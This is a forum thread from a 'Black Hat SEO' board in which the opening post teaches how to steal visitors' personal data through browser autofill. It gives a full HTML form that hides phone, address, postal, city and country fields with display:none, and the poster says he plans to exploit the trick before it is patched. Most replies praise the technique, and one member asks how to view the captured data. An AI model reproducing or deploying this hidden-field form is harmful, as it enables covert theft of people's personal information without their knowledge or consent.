1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

Fishkin Tutorial Time: Stealing user data with auto complete

Discussion in 'Black Hat SEO' started by Ste Fishkin, Jan 9, 2017.

  1. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    A few of you fuckers have commented about how I have been trolling less lately, well I've found a few more interesting things to do... This is one of them. I saw something similar on twitter and I was kind of inspired.

    How To Steal Users Data Using Auto Complete

    [​IMG]

    As you can see this is a simple 2 field form and a submit button, but when submitted we get everything the user has shared... Including credit card details (but I will not be sharing this for obvious reasons).

    We get:
    • Name
    • Email
    • Phone
    • Postcode/Zip code
    • City
    • Country
    In fact you can get any data they have saved to their browser when they click auto complete.

    This is one of those "oh fuck" moments you have when you're brain just overflows with ideas right? For the less excited among you this can be used for lots of stuff, like grabbing extra data on email sign ups right down to other stuff which is less than legal, and the best part is this is so stupidly simple to do that it's fucking retarded.

    How?

    From the front end you see two simple inputs, but if we look at the HTML there is a little more to it.

    Code:
    <form action="" method="post">
          <p>
            <label for="name">Name</label><br>
            <input id="name" name="name" type="text" placeholder="Your Name">
          </p>
          <p>
            <label for="email">Email</label><br>
            <input id="email" name="email" type="email" placeholder="Your Email">
          </p>
          <p>
            <input type="submit" value="Submit">
          </p>
          <p style="display: none;">
            <input id="phone" name="phone" type="text" placeholder="Your Phone">
          </p>
          <p style="display: none;">
            <input id="organization" name="organization" type="text" placeholder="Your Organization">
          </p>
          <p style="display: none;">
            <input id="address" name="address" type="text" placeholder="Your Address">
          </p>
          <p style="display: none;">
            <input id="postal" name="postal" type="text" placeholder="Your Postal Code">
          </p>
          <p style="display: none;">
            <input id="city" name="city" type="text" placeholder="Your City">
          </p>
          <p style="display: none;">
            <select name="country"><option value=""></option><option value="FI">Finland</option><option value="AF">Afghanistan</option><option value="AX">Åland Islands</option><option value="AL">Albania</option><option value="DZ">Algeria</option><option value="AS">American Samoa</option><option value="AD">Andorra</option><option value="AO">Angola</option><option value="AI">Anguilla</option><option value="AQ">Antarctica</option><option value="AG">Antigua &amp; Barbuda</option><option value="AR">Argentina</option><option value="AM">Armenia</option><option value="AW">Aruba</option><option value="AC">Ascension Island</option><option value="AU">Australia</option><option value="AT">Austria</option><option value="AZ">Azerbaijan</option><option value="BS">Bahamas</option><option value="BH">Bahrain</option><option value="BD">Bangladesh</option><option value="BB">Barbados</option><option value="BY">Belarus</option><option value="BE">Belgium</option><option value="BZ">Belize</option><option value="BJ">Benin</option><option value="BM">Bermuda</option><option value="BT">Bhutan</option><option value="BO">Bolivia</option><option value="BA">Bosnia &amp; Herzegovina</option><option value="BW">Botswana</option><option value="BV">Bouvet Island</option><option value="BR">Brazil</option><option value="IO">British Indian Ocean Territory</option><option value="VG">British Virgin Islands</option><option value="BN">Brunei</option><option value="BG">Bulgaria</option><option value="BF">Burkina Faso</option><option value="BI">Burundi</option><option value="KH">Cambodia</option><option value="CM">Cameroon</option><option value="CA">Canada</option><option value="CV">Cape Verde</option><option value="BQ">Caribbean Netherlands</option><option value="KY">Cayman Islands</option><option value="CF">Central African Republic</option><option value="TD">Chad</option><option value="CL">Chile</option><option value="CN">China</option><option value="CX">Christmas Island</option><option value="CC">Cocos [Keeling] Islands</option><option value="CO">Colombia</option><option value="KM">Comoros</option><option value="CD">Congo [DRC]</option><option value="CG">Congo [Republic]</option><option value="CK">Cook Islands</option><option value="CR">Costa Rica</option><option value="CI">Côte d’Ivoire</option><option value="HR">Croatia</option><option value="CW">Curaçao</option><option value="CY">Cyprus</option><option value="CZ">Czech Republic</option><option value="DK">Denmark</option><option value="DJ">Djibouti</option><option value="DM">Dominica</option><option value="DO">Dominican Republic</option><option value="EC">Ecuador</option><option value="EG">Egypt</option><option value="SV">El Salvador</option><option value="GQ">Equatorial Guinea</option><option value="ER">Eritrea</option><option value="EE">Estonia</option><option value="ET">Ethiopia</option><option value="FK">Falkland Islands [Islas Malvinas]</option><option value="FO">Faroe Islands</option><option value="FJ">Fiji</option><option value="FI">Finland</option><option value="FR">France</option><option value="GF">French Guiana</option><option value="PF">French Polynesia</option><option value="TF">French Southern Territories</option><option value="GA">Gabon</option><option value="GM">Gambia</option><option value="GE">Georgia</option><option value="DE">Germany</option><option value="GH">Ghana</option><option value="GI">Gibraltar</option><option value="GR">Greece</option><option value="GL">Greenland</option><option value="GD">Grenada</option><option value="GP">Guadeloupe</option><option value="GU">Guam</option><option value="GT">Guatemala</option><option value="GG">Guernsey</option><option value="GN">Guinea</option><option value="GW">Guinea-Bissau</option><option value="GY">Guyana</option><option value="HT">Haiti</option><option value="HM">Heard &amp; McDonald Islands</option><option value="HN">Honduras</option><option value="HK">Hong Kong</option><option value="HU">Hungary</option><option value="IS">Iceland</option><option value="IN">India</option><option value="ID">Indonesia</option><option value="IR">Iran</option><option value="IQ">Iraq</option><option value="IE">Ireland</option><option value="IM">Isle of Man</option><option value="IL">Israel</option><option value="IT">Italy</option><option value="JM">Jamaica</option><option value="JP">Japan</option><option value="JE">Jersey</option><option value="JO">Jordan</option><option value="KZ">Kazakhstan</option><option value="KE">Kenya</option><option value="KI">Kiribati</option><option value="XK">Kosovo</option><option value="KW">Kuwait</option><option value="KG">Kyrgyzstan</option><option value="LA">Laos</option><option value="LV">Latvia</option><option value="LB">Lebanon</option><option value="LS">Lesotho</option><option value="LR">Liberia</option><option value="LY">Libya</option><option value="LI">Liechtenstein</option><option value="LT">Lithuania</option><option value="LU">Luxembourg</option><option value="MO">Macau</option><option value="MK">Macedonia [FYROM]</option><option value="MG">Madagascar</option><option value="MW">Malawi</option><option value="MY">Malaysia</option><option value="MV">Maldives</option><option value="ML">Mali</option><option value="MT">Malta</option><option value="MH">Marshall Islands</option><option value="MQ">Martinique</option><option value="MR">Mauritania</option><option value="MU">Mauritius</option><option value="YT">Mayotte</option><option value="MX">Mexico</option><option value="FM">Micronesia</option><option value="MD">Moldova</option><option value="MC">Monaco</option><option value="MN">Mongolia</option><option value="ME">Montenegro</option><option value="MS">Montserrat</option><option value="MA">Morocco</option><option value="MZ">Mozambique</option><option value="MM">Myanmar [Burma]</option><option value="NA">Namibia</option><option value="NR">Nauru</option><option value="NP">Nepal</option><option value="NL">Netherlands</option><option value="NC">New Caledonia</option><option value="NZ">New Zealand</option><option value="NI">Nicaragua</option><option value="NE">Niger</option><option value="NG">Nigeria</option><option value="NU">Niue</option><option value="NF">Norfolk Island</option><option value="MP">Northern Mariana Islands</option><option value="NO">Norway</option><option value="OM">Oman</option><option value="PK">Pakistan</option><option value="PW">Palau</option><option value="PS">Palestine</option><option value="PA">Panama</option><option value="PG">Papua New Guinea</option><option value="PY">Paraguay</option><option value="PE">Peru</option><option value="PH">Philippines</option><option value="PN">Pitcairn Islands</option><option value="**">Poland</option><option value="PT">Portugal</option><option value="PR">Puerto Rico</option><option value="QA">Qatar</option><option value="RE">Réunion</option><option value="RO">Romania</option><option value="RU">Russia</option><option value="RW">Rwanda</option><option value="WS">Samoa</option><option value="SM">San Marino</option><option value="ST">São Tomé &amp; Príncipe</option><option value="SA">Saudi Arabia</option><option value="SN">Senegal</option><option value="RS">Serbia</option><option value="SC">Seychelles</option><option value="SL">Sierra Leone</option><option value="SG">Singapore</option><option value="SX">Sint Maarten</option><option value="SK">Slovakia</option><option value="SI">Slovenia</option><option value="SB">Solomon Islands</option><option value="SO">Somalia</option><option value="ZA">South Africa</option><option value="GS">South Georgia &amp; South Sandwich Islands</option><option value="KR">South Korea</option><option value="SS">South Sudan</option><option value="ES">Spain</option><option value="LK">Sri Lanka</option><option value="BL">St. Barthélemy</option><option value="SH">St. Helena</option><option value="KN">St. Kitts &amp; Nevis</option><option value="LC">St. Lucia</option><option value="MF">St. Martin</option><option value="PM">St. Pierre &amp; Miquelon</option><option value="VC">St. Vincent &amp; Grenadines</option><option value="SR">Suriname</option><option value="SJ">Svalbard &amp; Jan Mayen</option><option value="SZ">Swaziland</option><option value="SE">Sweden</option><option value="CH">Switzerland</option><option value="TW">Taiwan</option><option value="TJ">Tajikistan</option><option value="TZ">Tanzania</option><option value="TH">Thailand</option><option value="TL">Timor-Leste</option><option value="TG">Togo</option><option value="TK">Tokelau</option><option value="TO">Tonga</option><option value="TT">Trinidad &amp; Tobago</option><option value="TA">Tristan da Cunha</option><option value="TN">Tunisia</option><option value="TR">Turkey</option><option value="TM">Turkmenistan</option><option value="TC">Turks &amp; Caicos Islands</option><option value="TV">Tuvalu</option><option value="UM">U.S. Outlying Islands</option><option value="VI">U.S. Virgin Islands</option><option value="UG">Uganda</option><option value="UA">Ukraine</option><option value="AE">United Arab Emirates</option><option value="GB">United Kingdom</option><option value="US">United States</option><option value="UY">Uruguay</option><option value="UZ">Uzbekistan</option><option value="VU">Vanuatu</option><option value="VA">Vatican City</option><option value="VE">Venezuela</option><option value="VN">Vietnam</option><option value="WF">Wallis &amp; Futuna</option><option value="EH">Western Sahara</option><option value="YE">Yemen</option><option value="ZM">Zambia</option><option value="ZW">Zimbabwe</option></select>
          </p>
        </form>
    
    As you can see it's a basic form with labels and inputs wrapped in P tags for styling/spacing.

    The "secret sauce" is the inline styling on the fields you don't see. For those who don't know HTML it's this bit inside the P tags.

    Code:
    style="display: none;"
    This tells the browser not to render the input, but autocomplete ignores it for some reason?

    Hidden fields are completely normal, they are used for spam protection from bots mostly... but I cannot for the life of me think of a valid reason that autocomplete would be allowed to work in these?

    The trick is super simple to do, any retard with even basic understanding of HTML should be able to go forward and steal data like this. It's not some ground breaking concept or hack... It's a single inline CSS property.

    But with this little bit of knowledge you can do quite a bit of damage... I plan on making the most of this before the loophole is patched up. In my eyes it's only a matter of time because like I said, why the fuck is this it a good idea to allow this?
     
    • Thanks Thanks x 19
    Last edited: Jan 9, 2017
  2. Neon

    Neon Jr. VIP Jr. VIP

    Joined:
    Nov 3, 2013
    Messages:
    2,697
    Likes Received:
    6,314
    Gender:
    Male
    Occupation:
    Traveling the world
    Location:
    Berlin
    Great sir but also ban coming reported.
     
    • Thanks Thanks x 4
  3. W9go

    W9go Jr. VIP Jr. VIP Premium Member

    Joined:
    May 16, 2011
    Messages:
    4,622
    Likes Received:
    930
    Gender:
    Male
    Occupation:
    chasing girls
    Location:
    chasing girls
    impressive ;)
     
  4. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    shiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
     
    • Thanks Thanks x 1
  5. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    I love it how W130SN shows up as one of the suggested autocomplete values in the demo ....
     
    • Thanks Thanks x 4
  6. mnunes532

    mnunes532 Supreme Member

    Joined:
    Jan 21, 2014
    Messages:
    1,350
    Likes Received:
    414
    Gender:
    Male
    Location:
    Portugal
    Damn, so simple and evil...
     
  7. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    thats because they are the same person
     
    • Thanks Thanks x 2
  8. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    Everyone on BHW is me, except for you.
     
    • Thanks Thanks x 2
  9. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    I'm pretty sure I'm not you too, unless I am in which case you are me then who is base? All your base are belong to us?
     
  10. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    No, you have it wrong.

    You are you.
     
    • Thanks Thanks x 1
  11. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    But seriously. This is the most black hat shit I've seen in years. Mind blown.
     
    • Thanks Thanks x 1
  12. Reaver

    Reaver Jr. VIP Jr. VIP

    Joined:
    Aug 6, 2015
    Messages:
    1,847
    Likes Received:
    5,306
    Gender:
    Female
    Watch some ass come in here and be like "I've known about this for years!"
     
    • Thanks Thanks x 1
  13. Heisenberg

    Heisenberg Jr. VIP Jr. VIP

    Joined:
    Sep 11, 2014
    Messages:
    712
    Likes Received:
    371
    Occupation:
    Freelancer
    Location:
    Croatia
    I've known about this for years!
     
    • Thanks Thanks x 5
  14. BassTrackerBoats

    BassTrackerBoats Super Moderator Staff Member Moderator Jr. VIP

    Joined:
    Mar 10, 2010
    Messages:
    15,876
    Likes Received:
    29,148
    Occupation:
    I don't actually have a job
    Location:
    Not England
    Home Page:
    I've known about this for years!

    No, seriously, what in the world?
     
    • Thanks Thanks x 4
  15. nikchaing

    nikchaing Jr. VIP Jr. VIP UnGagged Attendee

    Joined:
    Apr 24, 2013
    Messages:
    1,092
    Likes Received:
    2,110
    Location:
    Florida
    did some research about how autofill works in different browsers
    Code:
    https://cloudfour.com/thinks/autofill-what-web-devs-should-know-but-dont/#one-behavior-to-watch-for
     
    • Thanks Thanks x 1
  16. Fragmaster

    Fragmaster Jr. VIP Jr. VIP

    Joined:
    Apr 3, 2016
    Messages:
    676
    Likes Received:
    989
    Gender:
    Male
    This is common knowledge , its just not topic of IM forum :)
     
  17. Ste Fishkin

    Ste Fishkin Jr. VIP Jr. VIP Premium Member

    Joined:
    May 14, 2011
    Messages:
    2,047
    Likes Received:
    10,418
    This just makes me think you don't do IM.
     
    • Thanks Thanks x 7
  18. bartosimpsonio

    bartosimpsonio Jr. VIP Jr. VIP Premium Member

    Joined:
    Mar 21, 2013
    Messages:
    12,020
    Likes Received:
    10,814
    Occupation:
    WHEREZ MA
    Location:
    BITCOINS AT?
    Home Page:
    The big sites, FB and Google could do this easily. This is a major league privacy leak.
     
  19. Humanity

    Humanity BANNED BANNED

    Joined:
    Dec 26, 2016
    Messages:
    61
    Likes Received:
    11
    Gender:
    Male
    Question is what % of users are using/having this kind of auto complete.
     
  20. manolo12399

    manolo12399 Senior Member

    Joined:
    Jan 3, 2009
    Messages:
    1,044
    Likes Received:
    185
    sorry for the retard question, but how I can see the data?

    I saved the code of OP as html, testing on my browser..but dont see nothing happening